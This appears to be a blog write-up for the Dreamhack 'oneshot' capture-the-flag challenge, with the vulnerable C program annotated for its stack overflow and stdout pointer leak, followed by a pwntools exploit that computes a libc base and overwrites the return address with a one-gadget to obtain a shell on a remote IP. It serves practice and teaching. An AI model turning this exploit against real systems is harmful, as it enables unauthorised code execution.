외로운 Nova의 작업실
dreamhack - oneshot write up 본문
- source code
// gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
// SIGALRM handler: report the timeout on stdout and end the process with
// exit status -1.
// NOTE(review): puts() and exit() are not async-signal-safe. That is tolerable
// in a throwaway challenge binary, but a production handler should restrict
// itself to async-signal-safe calls such as write() and _exit().
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
// One-time process setup: disable stdio buffering on stdin and stdout, then
// arm a watchdog that terminates the process through alarm_handler.
void initialize() {
    const unsigned int timeout_seconds = 60;

    // _IONBF: no buffering, so prompts and replies are not held back in a
    // stdio buffer.
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    // Install the handler before arming the timer so SIGALRM always finds it.
    signal(SIGALRM, alarm_handler);
    alarm(timeout_seconds);
}
// Challenge entry point: prints the address of stdout, reads a message from
// standard input and echoes it back. The code is intentionally vulnerable and
// is left unchanged here; the comments mark the weaknesses a reviewer should
// flag and the corresponding fixes.
// Returns 0 on the normal path; calls exit(0) if `check` is non-zero.
int main(int argc, char *argv[]) {
// 16-byte stack buffer; the read() below accepts up to 46 bytes.
char msg[16];
// Set to 0 and never assigned again, so it can only become non-zero if
// adjacent memory is overwritten. It behaves like a hand-rolled canary whose
// expected value (0) is known to anyone who can read the source.
size_t check = 0;
initialize();
// Information disclosure: printing the stdout pointer tells the peer where the
// C library's stdout object lives in this process, which undoes ASLR for
// everything at a fixed offset from it. Do not print pointers to untrusted
// peers.
printf("stdout: %p\n", stdout);
printf("MSG: ");
// Stack buffer overflow: up to 46 bytes are written into the 16-byte msg, so
// as many as 30 bytes land beyond the buffer. The build line disables the
// compiler's stack protector (-fno-stack-protector), so nothing but `check`
// stands between this write and the rest of the frame.
// Fix: bound the length with sizeof(msg) and check read()'s return value.
read(0, msg, 46);
// Only a non-zero `check` is rejected; an overflow that leaves it 0 passes.
if(check > 0) {
exit(0);
}
// read() does not NUL-terminate, so %s can keep printing past msg until it
// meets a zero byte (a further over-read).
printf("MSG: %s\n", msg);
// NOTE(review): memset() is used but <string.h> is not among the includes
// shown, so this relies on an implicit declaration.
memset(msg, 0, sizeof(msg));
return 0;
}
- exploit code
from pwn import *
# Solution script for the challenge binary listed above (pwntools).
# Connect to the challenge service.
p = remote("23.81.42.210", 9729)
# The binary prints "stdout: <pointer>" first; read that line and keep the hex
# digits without the trailing newline.
# NOTE(review): pwntools tubes work on bytes; passing str here relies on an
# implicit conversion -- confirm against the pwntools version in use.
p.recvuntil("stdout: ")
stdout = p.recvuntil("\n")[:-1]
# Step 1: compute the libc base address from the leaked pointer.
# 0x3c5620 is presumably the offset of stdout inside the libc build the service
# runs, and 0x45216 the offset of the chosen one-gadget in that same build.
# Both constants are only valid for that one libc binary -- TODO confirm which.
stdout = int(stdout, 16)
lib_base = stdout - 0x3c5620
one_gadget = lib_base + 0x45216
# Step 2: build the payload: 24 filler bytes, 8 zero bytes, 8 filler bytes,
# then the 8-byte little-endian address (48 bytes in total).
# The zero bytes presumably overlay `check`, so the `check > 0` test in main()
# still fails; the exact stack layout is compiler-dependent -- verify against
# the binary.
# The binary's read() takes at most 46 bytes, so the last two bytes sent (the
# most significant bytes of the address) are not consumed by that call.
payload = b"A"*24 + b"\x00"*8 + b"B"*8
payload += p64(one_gadget)
# Send the payload; it overwrites the saved return address with the one-gadget.
# This only works because the read is unbounded relative to msg, the binary is
# built without a stack protector, and it prints a libc pointer; removing any
# one of these breaks the chain.
p.send(payload)
# Print whatever the service sends back (the echoed "MSG: ..." line).
print(p.recv())
# Hand the connection over to the terminal.
p.interactive()